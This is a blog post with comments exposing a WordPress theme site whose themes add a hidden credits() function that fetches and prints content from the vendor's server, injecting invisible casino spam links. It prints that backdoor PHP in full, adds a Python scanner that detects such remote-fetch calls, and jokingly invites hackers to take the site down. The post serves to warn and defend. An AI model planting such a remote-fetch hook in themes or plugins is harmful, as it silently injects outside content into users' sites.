Don’t ever use www.templatesbrowser.com for WordPress themes

Today I noticed a JavaScript error on my site. On investigation I saw the following JavaScript code in the page source:

var CCounter=2151068; var CCsite=www.chapter31.com; CCinvisible=0;
<nosc/ript><a hreflang="de" lang="de" href="http://www.portalux.com/">online casino</a></nosc/ript>
var CCounter=2151068; var CCsite=www.chapter31.com; CCinvisible=0;

My investigations found that the site I downloaded the template from was a nice (NOT) little site called http://www.templatesbrowser.com/. What they do is add a “functions.php” file to the original code base, then call a function from the footer, “credits();”, which is defined in that functions.php file:

<?php

function credits()
{
 $url = "http://get.templatesbrowser.com/wp.php?" .
       "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
 $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
 if($check)
 {
  @readfile($url);
  fclose($check);
 }
}

?>
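
One way to audit a downloaded theme for this pattern before activating it (an added example, not code from the original post): the script flags PHP files that both name a remote host and call a function able to fetch from it. The function list, `scan_php`, `scan_theme` and the allow-list parameter are this example's own choices; the sample input is the `credits()` function quoted above.

```python
import re
import sys
from pathlib import Path

# PHP calls that can pull content from another server while a page renders.
FETCHERS = ("readfile", "file_get_contents", "fopen", "fsockopen",
            "curl_init", "curl_exec", "wp_remote_get")
CALL_RE = re.compile(r"\b(%s)\s*\(" % "|".join(FETCHERS), re.I)
URL_RE = re.compile(r"""["']https?://([A-Za-z0-9.-]+)""", re.I)
SOCK_RE = re.compile(r"""fsockopen\s*\(\s*["']([A-Za-z0-9.-]+)["']""", re.I)

# The credits() function quoted above, used as the sample input.
SAMPLE = r'''<?php
function credits()
{
 $url = "http://get.templatesbrowser.com/wp.php?" .
       "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
 $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
 if($check)
 {
  @readfile($url);
  fclose($check);
 }
}
?>'''

def scan_php(source, allowed_hosts=()):
    """Return (hosts, calls) when a file names a remote host that is not
    allow-listed and also calls a fetch function; otherwise None."""
    allowed = {h.lower() for h in allowed_hosts}
    found = URL_RE.findall(source) + SOCK_RE.findall(source)
    hosts = sorted({h.lower() for h in found} - allowed)
    calls = [(n, m.group(1).lower())
             for n, line in enumerate(source.splitlines(), 1)
             for m in CALL_RE.finditer(line)]
    return (hosts, calls) if hosts and calls else None

def scan_theme(theme_dir, allowed_hosts=()):
    """Scan every .php file under theme_dir; map relative path -> finding."""
    report = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        hit = scan_php(path.read_text(errors="replace"), allowed_hosts)
        if hit:
            report[str(path.relative_to(theme_dir))] = hit
    return report

if __name__ == "__main__":
    # With a directory argument, scan that theme; otherwise scan the sample.
    print(scan_theme(sys.argv[1]) if len(sys.argv) > 1 else scan_php(SAMPLE))
```

Encoded or string-assembled URLs will not match, so an empty report is triage, not proof that a theme is clean.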

More information was found from www.onnoot.com/:

This produces a link at the bottom of every WordPress page, that is invisible to human readers.

Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We’re not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google’s search result pages.

So for those who don’t know I hope this was useful, if any people out there are crackers/hackers do me a favour and pull their site down :)

10 Comments

  1. FastEddie
    January 24, 2008 at 1:48 pm | Permalink

    So… you downloaded a bunch of php code from a template website and simply ran it without checking first?

    errm.. there might be a flaw in this type of workflow. :-)

  2. January 24, 2008 at 6:38 pm | Permalink

    Yet another reason to use BlogCFC and not WordPress.

  3. January 24, 2008 at 8:27 pm | Permalink

    @FastEddie – well yeah I suppose that wasn’t the smartest thing to do!

    @Todd – yep, I use BlogCFC at work a bit. To be honest you just can’t beat the hosting plan I’m on at the moment which only has PHP. I am considering getting another plan which will cost a bit but give me ColdFusion. If/when that happens I’ll look to move to BlogCFC or MachBlog etc.

  4. Rachel
    January 25, 2008 at 2:50 am | Permalink

    @todd – not to dis Blog.CFC, but there are a lot more cool Wordpress themes than BlogCFC themes! ;) Hmm…maybe there’s some opportunity there…

  5. February 6, 2008 at 11:51 pm | Permalink

    I have been a frequent visitor of this blog for some time now, so I thought it would be a good idea to leave you with my thanks.

    Regards,
    Jim Mirkalami

  6. February 29, 2008 at 3:19 pm | Permalink

    I like your blog theme. I want to use it on my blog.
    Can you please tell me from where I can download this theme?

    Many thanks

    ——————————————————————————–
    Dan owner of the future gadgets blog future gadgets and inventions

  7. Nick
    May 14, 2008 at 6:48 am | Permalink

    ha, thanks. I had the same.

  8. October 18, 2008 at 9:51 pm | Permalink

    I am having a similar problem. I downloaded a theme from templatebrowser.com and am getting a casino link added to my database. I’ve changed my admin password and have deleted the link a couple times, but it keeps coming back. Any other ideas? The code you’ve described doesn’t exist in my codebase. Maybe I’ll just use another theme.

  9. October 19, 2008 at 12:14 am | Permalink

    @Nick – I wouldn’t EVER use a theme from templatebrowser.

    They could have put anything in the code anywhere. Much safer to try and go with something ‘official’.

    This isn’t just for spam content in your database, the theme could have malicious code to ‘phone home’ with your login details etc.

    Not good.

  10. October 20, 2008 at 11:47 pm | Permalink

    I changed to a different template I had downloaded, but I had the same issue; it was probably another one from templatebrowser.com. I downloaded a template from wordpress.org and no longer have the issue. I will post about this issue and link to yours to help spread the word. Thank you!

One Trackback

  1. [...] it took a few hours.   I did a little google’n and found this post by Michael Sharman http://www.chapter31.com/2008/01/24/dont-ever-user-wwwtemplatesbrowsercom-for-wordpress-themes/#comm... , which describes how themes from templatebrowser.com inject content into your blog.  I looked for [...]
